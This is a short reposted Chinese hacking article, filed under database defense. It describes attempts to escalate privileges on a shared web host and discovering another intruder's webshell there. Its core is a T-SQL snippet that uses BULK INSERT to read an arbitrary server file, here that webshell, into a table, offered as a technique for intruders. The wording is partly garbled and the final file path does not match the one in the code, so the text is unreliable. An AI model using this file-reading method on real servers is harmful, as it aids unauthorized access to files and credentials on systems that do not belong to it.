当前位置:七道奇文章资讯数据防范MSSQL防范
日期:2011-11-11 13:13:00  来源:本站整理

MSSQL读取文件号令[MSSQL防范]

赞助商链接



  本文“MSSQL读取文件号令[MSSQL防范]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

各种提权

包含

mssql:SA

mysql:ROOT

主机是星外的 可以看到目标目录

数据库是ASP的 不能插马

无奈找了很多人都木有办法...

本日无聊中查看目录 发现有一个高人上传了一个WEBSHELL

在网上找到了办法 发现用MSSQL读取文件的办法 目前分享一下

Use www.110hack.com;–(这里是随便选的一个数据库)

  drop table cmd;

  create table cmd (a text);

  BULK INSERT cmd

  FROM 'd:/freehos/webshell.cc.asp'

  WITH (

  FIELDTERMINATOR = 'n',

  ROWTERMINATOR = 'nn'

  )

  select * from cmd

  这样就成功读出了d:/freehos/ www.110hack.com .asp

摘自 webshell.cc   以上是“MSSQL读取文件号令[MSSQL防范]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:

  • MSSQL安全设置的具体步骤和办法小结
  • MSSQL 基本语法及实例操作语句
  • Debian Ubuntu下php连MSSQL
  • 常用的MSSQL日期函数
  • 怎样在Windows2003下设置MSSQL
  • <b>怎样复原MSSQL数据库</b>
  • 怎样导入本地数据到MSSQL远程数据库
  • 怎样更改IXWebHosting中MSSQL Quota的办法
  • MSSQL读取文件号令
  • Mssql反弹注射实录汇集
  • 对MSSQL数据库的判断与其特点
  • 查抄MSSQL存储历程
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .